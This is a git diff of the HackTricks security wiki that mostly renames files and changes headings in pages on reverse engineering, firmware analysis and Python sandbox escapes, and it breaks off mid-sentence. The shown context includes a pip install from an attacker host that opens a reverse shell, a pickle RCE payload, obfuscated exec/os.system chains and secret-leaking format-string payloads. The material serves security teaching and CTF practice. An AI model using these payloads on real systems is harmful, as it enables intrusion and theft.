exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md rename to group-1/linux-exploiting-basic-esp/bypassing-canary-and-pie.md diff --git a/exploiting/linux-exploiting-basic-esp/format-strings-template.md b/group-1/linux-exploiting-basic-esp/format-strings-template.md similarity index 100% rename from exploiting/linux-exploiting-basic-esp/format-strings-template.md rename to group-1/linux-exploiting-basic-esp/format-strings-template.md diff --git a/exploiting/linux-exploiting-basic-esp/fusion.md b/group-1/linux-exploiting-basic-esp/fusion.md similarity index 100% rename from exploiting/linux-exploiting-basic-esp/fusion.md rename to group-1/linux-exploiting-basic-esp/fusion.md diff --git a/exploiting/linux-exploiting-basic-esp/ret2lib.md b/group-1/linux-exploiting-basic-esp/ret2lib.md similarity index 100% rename from exploiting/linux-exploiting-basic-esp/ret2lib.md rename to group-1/linux-exploiting-basic-esp/ret2lib.md diff --git a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md b/group-1/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md similarity index 100% rename from exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md rename to group-1/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md diff --git a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md b/group-1/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md similarity index 100% rename from exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md rename to group-1/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md diff --git a/exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md b/group-1/linux-exploiting-basic-esp/rop-syscall-execv.md similarity index 100% rename from exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md rename to group-1/linux-exploiting-basic-esp/rop-syscall-execv.md diff --git a/group-1/reversing-and-exploiting.md b/group-1/reversing-and-exploiting.md new file mode 100644 index 000000000..7ebfeeb81 --- /dev/null +++ b/group-1/reversing-and-exploiting.md @@ -0,0 +1,2 @@ +# Reversing & Exploiting + diff --git a/reversing/reversing-tools-basic-methods/README.md b/group-1/reversing-tools-basic-methods/README.md similarity index 95% rename from reversing/reversing-tools-basic-methods/README.md rename to group-1/reversing-tools-basic-methods/README.md index b3a53e3e0..5fa7489c3 100644 --- a/reversing/reversing-tools-basic-methods/README.md +++ b/group-1/reversing-tools-basic-methods/README.md @@ -1,5 +1,7 @@ # Reversing Tools & Basic Methods +## Reversing Tools & Basic Methods +
Support HackTricks and get benefits! @@ -16,8 +18,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- -# Wasm decompiler / Wat compiler +## Wasm decompiler / Wat compiler Online: @@ -30,14 +31,14 @@ Software: * [https://www.pnfsoftware.com/jeb/demo](https://www.pnfsoftware.com/jeb/demo) * [https://github.com/wwwg/wasmdec](https://github.com/wwwg/wasmdec) -# .Net decompiler +## .Net decompiler [https://github.com/icsharpcode/ILSpy](https://github.com/icsharpcode/ILSpy)\ [ILSpy plugin for Visual Studio Code](https://github.com/icsharpcode/ilspy-vscode): You can have it in any OS (you can install it directly from VSCode, no need to download the git. Click on **Extensions** and **search ILSpy**).\ If you need to **decompile**, **modify** and **recompile** again you can use: [**https://github.com/0xd4d/dnSpy/releases**](https://github.com/0xd4d/dnSpy/releases) (**Right Click -> Modify Method** to change something inside a function).\ You cloud also try [https://www.jetbrains.com/es-es/decompiler/](https://www.jetbrains.com/es-es/decompiler/) -## DNSpy Logging +### DNSpy Logging In order to make **DNSpy log some information in a file**, you could use this .Net lines: @@ -47,7 +48,7 @@ path = "C:\\inetpub\\temp\\MyTest2.txt"; File.AppendAllText(path, "Password: " + password + "\n"); ``` -## DNSpy Debugging +### DNSpy Debugging In order to debug code using DNSpy you need to: @@ -108,14 +109,14 @@ Right click any module in **Assembly Explorer** and click **Sort Assemblies**: ![](<../../.gitbook/assets/image (285).png>) -# Java decompiler +## Java decompiler [https://github.com/skylot/jadx](https://github.com/skylot/jadx)\ [https://github.com/java-decompiler/jd-gui/releases](https://github.com/java-decompiler/jd-gui/releases) -# Debugging DLLs +## Debugging DLLs -## Using IDA +### Using IDA * **Load rundll32** (64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe) * Select **Windbg** debugger @@ -131,7 +132,7 @@ Then, when you start debugging **the execution will be stopped when each DLL is But, how can you get to the code of the DLL that was lodaded? Using this method, I don't know how. -## Using x64dbg/x32dbg +### Using x64dbg/x32dbg * **Load rundll32** (64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe) * **Change the Command Line** ( _File --> Change Command Line_ ) and set the path of the dll and the function that you want to call, for example: "C:\Windows\SysWOW64\rundll32.exe" "Z:\shared\Cybercamp\rev2\\\14.ridii\_2.dll",DLLMain @@ -144,7 +145,7 @@ Notice that when the execution is stopped by any reason in win64dbg you can see Then, looking to this ca see when the execution was stopped in the dll you want to debug. -# GUI Apps / Videogames +## GUI Apps / Videogames [**Cheat Engine**](https://www.cheatengine.org/downloads.php) is a useful program to find where important values are saved inside the memory of a running game and change them. More info in: @@ -152,13 +153,13 @@ Then, looking to this ca see when the execution was stopped in the dll you want [cheat-engine.md](cheat-engine.md) {% endcontent-ref %} -# ARM & MIPS +## ARM & MIPS {% embed url="https://github.com/nongiach/arm_now" %} -# Shellcodes +## Shellcodes -## Debugging a shellcode with blobrunner +### Debugging a shellcode with blobrunner [**Blobrunner**](https://github.com/OALabs/BlobRunner) will **allocate** the **shellcode** inside a space of memory, will **indicate** you the **memory address** were the shellcode was allocated and will **stop** the execution.\ Then, you need to **attach a debugger** (Ida or x64dbg) to the process and put a **breakpoint the indicated memory address** and **resume** the execution. This way you will be debugging the shellcode. @@ -170,7 +171,7 @@ You can find a slightly modified version of Blobrunner in the following link. In [blobrunner.md](blobrunner.md) {% endcontent-ref %} -## Debugging a shellcode with jmp2it +### Debugging a shellcode with jmp2it [**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)is very similar to blobrunner. It will **allocate** the **shellcode** inside a space of memory, and start an **eternal loop**. You then need to **attach the debugger** to the process, **play start wait 2-5 secs and press stop** and you will find yourself inside the **eternal loop**. Jump to the next instruction of the eternal loop as it will be a call to the shellcode, and finally you will find yourself executing the shellcode. @@ -178,7 +179,7 @@ You can find a slightly modified version of Blobrunner in the following link. In You can download a compiled version of [jmp2it inside the releases page](https://github.com/adamkramer/jmp2it/releases/). -## Debugging shellcode using Cutter +### Debugging shellcode using Cutter [**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0) is the GUI of radare. Using cutter you can emulate the shellcode and inspect it dynamically. @@ -196,7 +197,7 @@ You can see the stack for example inside a hex dump: ![](<../../.gitbook/assets/image (402).png>) -## Deobfuscating shellcode and getting executed functions +### Deobfuscating shellcode and getting executed functions You should try [**scdbg**](http://sandsprite.com/blogs/index.php?uid=7\&pid=152).\ It will tell you things like **which functions** is the shellcode using and if the shellcode is **decoding** itself in memory. @@ -216,11 +217,11 @@ scDbg also counts with a graphical launcher where you can select the options you The **Create Dump** option will dump the final shellcode if any change is done to the shellcode dynamically in memory (useful to download the decoded shellcode). The **start offset** can be useful to start the shellcode at a specific offset. The **Debug Shell** option is useful to debug the shellcode using the scDbg terminal (however I find any of the options explained before better for this matter as you will be able to use Ida or x64dbg). -## Disassembling using CyberChef +### Disassembling using CyberChef Upload you shellcode file as input and use the following receipt to decompile it: [https://gchq.github.io/CyberChef/#recipe=To\_Hex('Space',0)Disassemble\_x86('32','Full%20x86%20architecture',16,0,true,true)](https://gchq.github.io/CyberChef/#recipe=To\_Hex\('Space',0\)Disassemble\_x86\('32','Full%20x86%20architecture',16,0,true,true\)) -# [Movfuscator](https://github.com/xoreaxeaxeax/movfuscator) +## [Movfuscator](https://github.com/xoreaxeaxeax/movfuscator) This obfuscator **modify all the instructions for `mov`**(yeah, really cool). It also uses interruptions to change executions flows. For more information about how does it works: @@ -238,7 +239,7 @@ And [install keystone](https://github.com/keystone-engine/keystone/blob/master/d If you are playing a **CTF, this workaround to find the flag** could be very useful: [https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html) -# Rust +## Rust To find the **entry point** search the functions by `::main` like in: @@ -247,7 +248,7 @@ To find the **entry point** search the functions by `::main` like in: In this case the binary was called authenticator, so it's pretty obvious that this is the interesting main function.\ Having the **name** of the **functions** being called, search for them on the **Internet** to learn about their **inputs** and **outputs**. -# **Delphi** +## **Delphi** For Delphi compiled binaries you can use [https://github.com/crypto2011/IDR](https://github.com/crypto2011/IDR) @@ -259,7 +260,7 @@ This plugin will execute the binary and resolve function names dynamically at th It is also very interesting because if you press a button in the graphic application the debugger will stop in the function executed by that bottom. -# Golang +## Golang I you have to reverse a Golang binary I would suggest you to use the IDA plugin [https://github.com/sibears/IDAGolangHelper](https://github.com/sibears/IDAGolangHelper) @@ -267,15 +268,15 @@ Just press **ATL+f7** (import python plugin in IDA) and select the python plugin This will resolve the names of the functions. -# Compiled Python +## Compiled Python In this page you can find how to get the python code from an ELF/EXE python compiled binary: -{% content-ref url="../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %} -[.pyc.md](../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md) +{% content-ref url="../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %} +[.pyc.md](../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md) {% endcontent-ref %} -# GBA - Game Body Advance +## GBA - Game Body Advance If you get the **binary** of a GBA game you can use different tools to **emulate** and **debug** it: @@ -388,11 +389,11 @@ So, in this challenge, knowing the values of the buttons, you needed to **press **Reference for this tutorial:** [**https://exp.codes/Nostalgia/**](https://exp.codes/Nostalgia/) -# Game Boy +## Game Boy {% embed url="https://www.youtube.com/watch?v=VVbRe7wr3G4" %} -# Courses +## Courses * [https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering) * [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (Binary deobfuscation) diff --git a/reversing/reversing-tools-basic-methods/angr/README.md b/group-1/reversing-tools-basic-methods/angr/README.md similarity index 100% rename from reversing/reversing-tools-basic-methods/angr/README.md rename to group-1/reversing-tools-basic-methods/angr/README.md diff --git a/reversing/reversing-tools-basic-methods/angr/angr-examples.md b/group-1/reversing-tools-basic-methods/angr/angr-examples.md similarity index 100% rename from reversing/reversing-tools-basic-methods/angr/angr-examples.md rename to group-1/reversing-tools-basic-methods/angr/angr-examples.md diff --git a/reversing/reversing-tools-basic-methods/blobrunner.md b/group-1/reversing-tools-basic-methods/blobrunner.md similarity index 100% rename from reversing/reversing-tools-basic-methods/blobrunner.md rename to group-1/reversing-tools-basic-methods/blobrunner.md diff --git a/reversing/reversing-tools-basic-methods/cheat-engine.md b/group-1/reversing-tools-basic-methods/cheat-engine.md similarity index 100% rename from reversing/reversing-tools-basic-methods/cheat-engine.md rename to group-1/reversing-tools-basic-methods/cheat-engine.md diff --git a/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md b/group-1/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md similarity index 100% rename from reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md rename to group-1/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md diff --git a/exploiting/tools/README.md b/group-1/tools/README.md similarity index 100% rename from exploiting/tools/README.md rename to group-1/tools/README.md diff --git a/exploiting/tools/pwntools.md b/group-1/tools/pwntools.md similarity index 100% rename from exploiting/tools/pwntools.md rename to group-1/tools/pwntools.md diff --git a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md b/group-1/windows-exploiting-basic-guide-oscp-lvl.md similarity index 100% rename from exploiting/windows-exploiting-basic-guide-oscp-lvl.md rename to group-1/windows-exploiting-basic-guide-oscp-lvl.md diff --git a/physical-attacks/escaping-from-gui-applications/README.md b/hardware-physical-access/escaping-from-gui-applications/README.md similarity index 100% rename from physical-attacks/escaping-from-gui-applications/README.md rename to hardware-physical-access/escaping-from-gui-applications/README.md diff --git a/physical-attacks/escaping-from-gui-applications/show-file-extensions.md b/hardware-physical-access/escaping-from-gui-applications/show-file-extensions.md similarity index 100% rename from physical-attacks/escaping-from-gui-applications/show-file-extensions.md rename to hardware-physical-access/escaping-from-gui-applications/show-file-extensions.md diff --git a/physical-attacks/firmware-analysis/README.md b/hardware-physical-access/firmware-analysis/README.md similarity index 96% rename from physical-attacks/firmware-analysis/README.md rename to hardware-physical-access/firmware-analysis/README.md index 4efef6cc7..f19cfff37 100644 --- a/physical-attacks/firmware-analysis/README.md +++ b/hardware-physical-access/firmware-analysis/README.md @@ -1,4 +1,4 @@ - +# Firmware Analysis
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- -# Introduction +## Introduction Firmware is a type of software that provides communication and control over a device’s hardware components. It’s the first piece of code that a device runs. Usually, it **boots the operating system** and provides very specific runtime services for programs by **communicating with various hardware components**. Most, if not all, electronic devices have firmware. @@ -25,7 +24,7 @@ Devices store firmware in **nonvolatile memory**, such as ROM, EPROM, or flash m It’s important to **examine** the **firmware** and then attempt to **modify** it, because we can uncover many security issues during this process. -# **Information gathering and reconnaissance** +## **Information gathering and reconnaissance** During this stage, collect as much information about the target as possible to understand its overall composition underlying technology. Attempt to gather the following: @@ -47,7 +46,7 @@ During this stage, collect as much information about the target as possible to u Where possible, acquire data using open source intelligence (OSINT) tools and techniques. If open source software is used, download the repository and perform both manual as well as automated static analysis against the code base. Sometimes, open source software projects already use free static analysis tools provided by vendors that provide scan results such as [Coverity Scan](https://scan.coverity.com) and [Semmle’s LGTM](https://lgtm.com/#explore). -# Getting the Firmware +## Getting the Firmware There are different ways with different difficulty levels to download the firmware @@ -66,7 +65,7 @@ There are different ways with different difficulty levels to download the firmwa * Removing the **flash chip** (e.g. SPI) or MCU from the board for offline analysis and data extraction (LAST RESORT). * You will need a supported chip programmer for flash storage and/or the MCU. -# Analyzing the firmware +## Analyzing the firmware Now that you **have the firmware**, you need to extract information about it to know how to treat it. Different tools you can use for that: @@ -83,18 +82,18 @@ If you don't find much with those tools check the **entropy** of the image with Moreover, you can use these tools to extract **files embedded inside the firmware**: -{% content-ref url="../../forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md" %} -[file-data-carving-recovery-tools.md](../../forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md) +{% content-ref url="../../generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md" %} +[file-data-carving-recovery-tools.md](../../generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md) {% endcontent-ref %} Or [**binvis.io**](https://binvis.io/#/) ([code](https://code.google.com/archive/p/binvis/)) to inspect the file. -## Getting the Filesystem +### Getting the Filesystem With the previous commented tools like `binwalk -ev ` you should have been able to **extract the filesystem**.\ Binwalk usually extracts it inside a **folder named as the filesystem type**, which usually is one of the following: squashfs, ubifs, romfs, rootfs, jffs2, yaffs2, cramfs, initramfs. -### Manual Filesystem Extraction +#### Manual Filesystem Extraction Sometimes, binwalk will **not have the magic byte of the filesystem in its signatures**. In these cases, use binwalk to **find the offset of the filesystem and carve the compressed filesystem** from the binary and **manually extract** the filesystem according to its type using the steps below. @@ -146,7 +145,7 @@ Files will be in "`squashfs-root`" directory afterwards. `$ ubidump.py ` -## Analyzing the Filesystem +### Analyzing the Filesystem Now that you have the filesystem is time to start looking for bad practices such as: @@ -199,7 +198,7 @@ Inside the filesystem you can also find **source code** of programs (that you sh Tools like [**checksec.sh**](https://github.com/slimm609/checksec.sh) can be useful to find unprotected binaries. For Windows binaries you could use [**PESecurity**](https://github.com/NetSPI/PESecurity). {% endhint %} -# Emulating Firmware +## Emulating Firmware The idea to emulate the Firmware is to be able to perform a **dynamic analysis** of the device **running** or of a **single program**. @@ -207,11 +206,11 @@ The idea to emulate the Firmware is to be able to perform a **dynamic analysis** At times, partial or full emulation **may not work due to a hardware or architecture dependencies**. If the architecture and endianness match a device owned such as a raspberry pie, the root filesystem or specific binary can be transferred to the device for further testing. This method also applies to pre built virtual machines using the same architecture and endianness as the target. {% endhint %} -## Binary Emulation +### Binary Emulation If you just want to emulate one program to search for vulnerabilities, you first need to identify its endianness and the CPU architecture for which it was compiled. -### MIPS example +#### MIPS example ```bash file ./squashfs-root/bin/busybox @@ -231,7 +230,7 @@ qemu-mips -L ./squashfs-root/ ./squashfs-root/bin/ls 100 100.7z 15A6D2.squashfs squashfs-root squashfs-root-0 ``` -### ARM Example +#### ARM Example ```bash file bin/busybox @@ -245,7 +244,7 @@ qemu-arm -L ./squashfs-root/ ./squashfs-root/bin/ls 1C00000.squashfs B80B6C C41DD6.xz squashfs-root squashfs-root-0 ``` -## Full System Emulation +### Full System Emulation There are several tools, based in **qemu** in general, that will allow you to emulate the complete firmware: @@ -257,7 +256,7 @@ There are several tools, based in **qemu** in general, that will allow you to em * [**https://github.com/getCUJO/MIPS-X**](https://github.com/getCUJO/MIPS-X) * [**https://github.com/qilingframework/qiling#qltool**](https://github.com/qilingframework/qiling#qltool) -# **Dynamic analysis** +## **Dynamic analysis** In this stage you should have either a device running the firmware to attack or the firmware being emulated to attack. In any case, it's highly recommended that you also have **a shell in the OS and filesystem that is running**. @@ -283,7 +282,7 @@ You should test if the device is doing any kind of **firmware integrity tests**, Firmware update vulnerabilities usually occurs because, the **integrity** of the **firmware** might **not** be **validated**, use **unencrypted** **network** protocols, use of **hardcoded** **credentials**, an **insecure authentication** to the cloud component that hosts the firmware, and even excessive and insecure **logging** (sensitive data), allow **physical updates** without verifications. -# **Runtime analysis** +## **Runtime analysis** Runtime analysis involves attaching to a running process or binary while a device is running in its normal or emulated environment. Basic runtime analysis steps are provided below: @@ -305,7 +304,7 @@ Tools that may be helpful are (non-exhaustive): * Binary Ninja * Hopper -# **Binary Exploitation** +## **Binary Exploitation** After identifying a vulnerability within a binary from previous steps, a proper proof-of-concept (PoC) is required to demonstrate the real-world impact and risk. Developing exploit code requires programming experience in lower level languages (e.g. ASM, C/C++, shellcode, etc.) as well as background within the particular target architecture (e.g. MIPS, ARM, x86 etc.). PoC code involves obtaining arbitrary execution on a device or application by controlling an instruction in memory. @@ -316,12 +315,12 @@ Utilize the following references for further guidance: * [https://azeria-labs.com/writing-arm-shellcode/](https://azeria-labs.com/writing-arm-shellcode/) * [https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/](https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/) -# Prepared OSs to analyze Firmware +## Prepared OSs to analyze Firmware * [**AttifyOS**](https://github.com/adi0x90/attifyos): AttifyOS is a distro intended to help you perform security assessment and penetration testing of Internet of Things (IoT) devices. It saves you a lot of time by providing a pre-configured environment with all the necessary tools loaded. * [**EmbedOS**](https://github.com/scriptingxss/EmbedOS): Embedded security testing operating system based on Ubuntu 18.04 preloaded with firmware security testing tools. -# Vulnerable firmware to practice +## Vulnerable firmware to practice To practice discovering vulnerabilities in firmware, use the following vulnerable firmware projects as a starting point. @@ -338,16 +337,15 @@ To practice discovering vulnerabilities in firmware, use the following vulnerabl * Damn Vulnerable IoT Device (DVID) * [https://github.com/Vulcainreo/DVID](https://github.com/Vulcainreo/DVID) -# References +## References * [https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/) * [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://www.amazon.co.uk/Practical-IoT-Hacking-F-Chantzis/dp/1718500904) -# Trainning and Cert +## Trainning and Cert * [https://www.attify-store.com/products/offensive-iot-exploitation](https://www.attify-store.com/products/offensive-iot-exploitation) -
Support HackTricks and get benefits! @@ -363,5 +361,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/physical-attacks/firmware-analysis/bootloader-testing.md b/hardware-physical-access/firmware-analysis/bootloader-testing.md similarity index 100% rename from physical-attacks/firmware-analysis/bootloader-testing.md rename to hardware-physical-access/firmware-analysis/bootloader-testing.md diff --git a/physical-attacks/firmware-analysis/firmware-integrity.md b/hardware-physical-access/firmware-analysis/firmware-integrity.md similarity index 100% rename from physical-attacks/firmware-analysis/firmware-integrity.md rename to hardware-physical-access/firmware-analysis/firmware-integrity.md diff --git a/physical-attacks/physical-attacks.md b/hardware-physical-access/physical-attacks.md similarity index 100% rename from physical-attacks/physical-attacks.md rename to hardware-physical-access/physical-attacks.md diff --git a/misc/basic-python/bypass-python-sandboxes/README.md b/misc/basic-python/bypass-python-sandboxes/README.md index 722516a4b..45a476152 100644 --- a/misc/basic-python/bypass-python-sandboxes/README.md +++ b/misc/basic-python/bypass-python-sandboxes/README.md @@ -1,4 +1,4 @@ - +# Bypass Python sandboxes
@@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- These are some tricks to bypass python sandbox protections and execute arbitrary commands. -# Command Execution Libraries +## Command Execution Libraries The first thing you need to know is if you can directly execute code with some already imported library, or if you could import any of these libraries: @@ -66,9 +65,9 @@ Python try to **load libraries from the current directory first** (the following ![](<../../../.gitbook/assets/image (552).png>) -# Bypass pickle sandbox with default installed python packages +## Bypass pickle sandbox with default installed python packages -## Default packages +### Default packages You can find a **list of pre-installed** packages here: [https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html](https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html)\ Note that from a pickle you can make the python env **import arbitrary libraries** installed in the system.\ @@ -89,7 +88,7 @@ print(base64.b64encode(pickle.dumps(P(), protocol=0))) For more information about how does pickle works check this: [https://checkoway.net/musings/pickle/](https://checkoway.net/musings/pickle/) -## Pip package +### Pip package Trick shared by **@isHaacK** @@ -102,13 +101,13 @@ pip.main(["install", "http://attacker.com/Rerverse.tar.gz"]) You can download the package to create the reverse shell here. Please, note that before using it you should **decompress it, change the `setup.py`, and put your IP for the reverse shell**: -{% file src="../../../.gitbook/assets/reverse.tar.gz" %} +{% file src="../../../.gitbook/assets/Reverse.tar.gz" %} {% hint style="info" %} This package is called `Reverse`.However, it was specially crafted so when you exit the reverse shell the rest of the installation will fail, so you **won't leave any extra python package installed on the server** when you leave. {% endhint %} -# Eval-ing python code +## Eval-ing python code This is really interesting if some characters are forbidden because you can use the **hex/octal/B64** representation to **bypass** the restriction: @@ -133,7 +132,7 @@ exec('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='.decode("base64")) #Only python2 exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk=')) ``` -# Builtins +## Builtins * [**Builtins functions of python2**](https://docs.python.org/2/library/functions.html) * [**Builtins functions of python3**](https://docs.python.org/3/library/functions.html) @@ -145,7 +144,7 @@ __builtins__.__import__("os").system("ls") __builtins__.__dict__['__import__']("os").system("ls") ``` -## No Builtins +### No Builtins When you don't have `__builtins__` you are not going to be able to import anything nor even read or write files as **all the global functions** (like `open`, `import`, `print`...) **aren't loaded**.\ However, **by default python import a lot of modules in memory**. This modules may seem benign, but some of them are **also importing dangerous** functionalities inside of them that can be accessed to gain even **arbitrary code execution**. @@ -175,7 +174,7 @@ import __builtin__ get_flag.__globals__['__builtins__']['__import__']("os").system("ls") ``` -### Python3 +#### Python3 ```python # Obtain builtins from a globally defined function @@ -194,7 +193,7 @@ get_flag.__globals__['__builtins__'] [**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **builtins**. -### Python2 and Python3 +#### Python2 and Python3 ```python # Recover __builtins__ and make eveything easier @@ -202,7 +201,7 @@ __builtins__= [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ __builtins__["__import__"]('os').system('ls') ``` -## Builtins payloads +### Builtins payloads ```python # Possible payloads once you have found the builtins @@ -212,7 +211,7 @@ __builtins__["__import__"]('os').system('ls') # See them below ``` -# Globals and locals +## Globals and locals Checking the **`globals`** and **`locals`** is a good way to know what you can access. @@ -242,11 +241,11 @@ class_obj.__init__.__globals__ [**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **globals**. -# Discover Arbitrary Execution +## Discover Arbitrary Execution Here I want to explain how to easily discover **more dangerous functionalities loaded** and propose more reliable exploits. -### Accessing subclasses with bypasses +#### Accessing subclasses with bypasses One of the most sensitive parts of this technique is to be able to **access the base subclasses**. In the previous examples this was done using `''.__class__.__base__.__subclasses__()` but there are **other possible ways**: @@ -275,7 +274,7 @@ defined_func.__class__.__base__.__subclasses__() (''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fmro\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')(1)|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(132)|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('popen'))('cat+flag.txt').read() ``` -## Finding dangerous libraries loaded +### Finding dangerous libraries loaded For example, knowing that with the library **`sys`** it's possible to **import arbitrary libraries**, you can search for all the **modules loaded that have imported sys inside of them**: @@ -383,7 +382,7 @@ __builtins__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, Fil """ ``` -# Recursive Search of Builtins, Globals... +## Recursive Search of Builtins, Globals... {% hint style="warning" %} This is just **awesome**. If you are **looking for an object like globals, builtins, open or anything** just use this script to **recursively find places were you can find that object.** @@ -511,7 +510,7 @@ You can check the output of this script in this page: [output-searching-python-internals.md](output-searching-python-internals.md) {% endcontent-ref %} -# Python Format String +## Python Format String If you **send** a **string** to python that is going to be **formatted**, you can use `{}` to access **python internal information.** You can use the previous examples to access globals or builtins for example. @@ -566,7 +565,7 @@ class HAL9000(object): **More examples** about **format** **string** examples can be found in [**https://pyformat.info/**](https://pyformat.info) -## Sensitive Information Disclosure Payloads +### Sensitive Information Disclosure Payloads ```python {whoami.__class__.__dict__} @@ -579,7 +578,7 @@ class HAL9000(object): {whoami.__globals__[server].__dict__[bridge].__dict__[db].__dict__} ``` -# Dissecting Python Objects +## Dissecting Python Objects {% hint style="info" %} If you want to **learn** about **python bytecode** in depth read these **awesome** post about the topic: [**https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d**](https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d) @@ -600,7 +599,7 @@ def get_flag(some_input): return "Nope" ``` -### dir +#### dir ```python dir() #General dir() to find what we have loaded @@ -609,7 +608,7 @@ dir(get_flag) #Get info tof the function ['__call__', '__class__', '__closure__', '__code__', '__defaults__', '__delattr__', '__dict__', '__doc__', '__format__', '__get__', '__getattribute__', '__globals__', '__hash__', '__init__', '__module__', '__name__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'func_closure', 'func_code', 'func_defaults', 'func_dict', 'func_doc', 'func_globals', 'func_name'] ``` -### globals +#### globals `__globals__` and `func_globals`(Same) Obtains the global environment. In the example you can see some imported modules, some global variables and their content declared: @@ -624,7 +623,7 @@ CustomClassObject.__class__.__init__.__globals__ [**See here more places to obtain globals**](./#globals-and-locals) -## **Accessing the function code** +### **Accessing the function code** **`__code__`** and `func_code`: You can **access** this **attribute** of the function to **obtain the code object** of the function. @@ -642,7 +641,7 @@ dir(get_flag.__code__) ['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals', 'co_stacksize', 'co_varnames'] ``` -## Getting Code Information +### Getting Code Information ```python # Another example @@ -690,7 +689,7 @@ get_flag.__code__.co_code 'd\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S' ``` -## **Disassembly a function** +### **Disassembly a function** ```python import dis @@ -744,7 +743,7 @@ dis.dis('d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x0 47 RETURN_VALUE ``` -# Compiling Python +## Compiling Python Now, lets imagine that somehow you can **dump the information about a function that you cannot execute** but you **need** to **execute** it.\ Like in the following example, you **can access the code object** of that function, but just reading the disassemble you **don't know how to calculate the flag** (_imagine a more complex `calc_flag` function_) @@ -762,7 +761,7 @@ def get_flag(some_input): return "Nope" ``` -## Creating the code object +### Creating the code object First of all, we need to know **how to create and execute a code object** so we can create one to execute our function leaked: @@ -795,7 +794,7 @@ types.CodeType.__doc__ ``` {% endhint %} -## Recreating a leaked function +### Recreating a leaked function {% hint style="warning" %} In the following example we are going to take all the data needed to recreate the function from the function code object directly. In a **real example**, all the **values** to execute the function **`code_type`** is what **you will need to leak**. @@ -812,7 +811,7 @@ function_type(code_obj, mydict, None, None, None)("secretcode") #ThisIsTheFlag ``` -## Bypass Defenses +### Bypass Defenses In previous examples at the 